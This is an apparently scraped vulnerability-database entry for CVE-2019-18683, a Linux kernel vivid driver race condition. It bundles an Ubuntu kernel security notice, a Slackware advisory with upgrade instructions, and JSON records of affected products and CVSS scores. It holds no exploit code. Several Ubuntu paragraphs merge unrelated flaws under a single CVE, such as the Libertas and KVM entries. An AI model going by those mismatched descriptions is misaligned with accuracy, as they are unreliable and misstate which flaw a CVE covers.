+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAl4WVEYACgkQakRjwEAQIjMljgCfTQKeQBRpNgxFhMtrKSwy0afq emEAoI4MwPctKJAsQZyfhUymhvQ6bWUh =xnPY -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-4287-2 February 18, 2020

linux-azure vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-azure: Linux kernel for Microsoft Azure Cloud systems

Details:

USN-4287-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux kernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM.

It was discovered that the Linux kernel did not properly clear data structures on context switches for certain Intel graphics processors. A local attacker could use this to expose sensitive information. (CVE-2019-14615)

It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15099)

It was discovered that the HSA Linux kernel driver for AMD GPU devices did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16229)

It was discovered that the Marvell 8xxx Libertas WLAN device driver in the Linux kernel did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. An attacker with write access to /dev/video0 on a system with the vivid module loaded could possibly use this to gain administrative privileges. (CVE-2019-18683)

It was discovered that the Renesas Digital Radio Interface (DRIF) driver in the Linux kernel did not properly initialize data. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2019-18786)

It was discovered that the Afatech AF9005 DVB-T USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could possibly use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-18809)

It was discovered that the btrfs file system in the Linux kernel did not properly validate metadata, leading to a NULL pointer dereference. An attacker could use this to specially craft a file system image that, when mounted, could cause a denial of service (system crash). A local attacker could possibly use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-19057)

It was discovered that the crypto subsystem in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-19062)

It was discovered that the Realtek rtlwifi USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could possibly use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-19063)

It was discovered that the RSI 91x WLAN device driver in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-19071)

It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could possibly use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-19078)

It was discovered that the AMD GPU device drivers in the Linux kernel did not properly deallocate memory in certain error conditions. A local attacker could use this to possibly cause a denial of service (kernel memory exhaustion). (CVE-2019-19082)

Dan Carpenter discovered that the AppleTalk networking subsystem of the Linux kernel did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-19227)

It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly handle ioctl requests to get emulated CPUID features. An attacker with access to /dev/kvm could use this to cause a denial of service (system crash). An attacker could use this to specially craft an ext4 file system that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19767)

Gao Chuan discovered that the SAS Class driver in the Linux kernel contained a race condition that could lead to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-19965)

It was discovered that the Datagram Congestion Control Protocol (DCCP) implementation in the Linux kernel did not properly deallocate memory in certain error conditions. An attacker could possibly use this to cause a denial of service (kernel memory exhaustion). (CVE-2019-20096)

Mitchell Frank discovered that the Wi-Fi implementation in the Linux kernel when used as an access point would send IAPP location updates for stations before client authentication had completed. A physically proximate attacker could use this to cause a denial of service. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-7053)

It was discovered that the B2C2 FlexCop USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15291)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.15.0-1069-azure 4.15.0-1069.74~14.04.1 linux-image-azure 4.15.0.1069.55

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4287-2 https://usn.ubuntu.com/4287-1 CVE-2019-14615, CVE-2019-15099, CVE-2019-15291, CVE-2019-16229, CVE-2019-16232, CVE-2019-18683, CVE-2019-18786, CVE-2019-18809, CVE-2019-18885, CVE-2019-19057, CVE-2019-19062, CVE-2019-19063, CVE-2019-19071, CVE-2019-19078, CVE-2019-19082, CVE-2019-19227, CVE-2019-19332, CVE-2019-19767, CVE-2019-19965, CVE-2019-20096, CVE-2019-5108, CVE-2020-7053

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-0712",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.204"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3.14"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.157"
      },
      {
        "model": "fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.87"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.204"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.3.8"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.3.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.70.1",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:fabric_operating_system:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-18683",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.9,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2019-18683",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-18683",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-18683",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-066",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-18683",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free. Linux Kernel Contains a race condition vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security]  Slackware 14.2 kernel (SSA:2020-008-01)\n\nNew kernel packages are available for Slackware 14.2 to fix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.208/*:  Upgraded. \n   IPV6_MULTIPLE_TABLES n -\u003e y\n  +IPV6_SUBTREES y\n  These updates fix various bugs and security issues. \n  Be sure to upgrade your initrd after upgrading the kernel packages. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.203:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19524\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15917\n    Fixed in 4.4.204:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18660\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15291\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18683\n    Fixed in 4.4.206:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12614\n    Fixed in 4.4.207:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19227\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19338\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332\n    Fixed in 4.4.208:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19057\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19063\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\nef3ab53561656d90c19389bed7f883ea  kernel-generic-4.4.208-i586-1.txz\nce33ac504adf47d140c3d9ffbf7589b2  kernel-generic-smp-4.4.208_smp-i686-1.txz\n2fb222e279ceacf6e3af294a1cce54e9  kernel-headers-4.4.208_smp-x86-1.txz\nc237d6708a9d59080deb5a6659d1acf1  kernel-huge-4.4.208-i586-1.txz\n29018038f4e0510dfa7e9cdfe69c994a  kernel-huge-smp-4.4.208_smp-i686-1.txz\n6518395d78e7c7b323bd964dd3b9ed13  kernel-modules-4.4.208-i586-1.txz\n440885e37ee410473bf1c9a6b028dd8b  kernel-modules-smp-4.4.208_smp-i686-1.txz\n969021b83f0cb73d7b745b3d77bdbee0  kernel-source-4.4.208_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\nd6edb0754c752aaf8fcbd8d4d5bfc30a  kernel-generic-4.4.208-x86_64-1.txz\n10255231f7085336046b49e829bf972c  kernel-headers-4.4.208-x86-1.txz\n369fa14fb7f59f1e903402be3ad685e7  kernel-huge-4.4.208-x86_64-1.txz\nb8c8261fbb6bed66c3ded3aa36e206df  kernel-modules-4.4.208-x86_64-1.txz\n83f37ca83c19fe8d1a785c93cc1ad6f5  kernel-source-4.4.208-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.208-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.208 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security 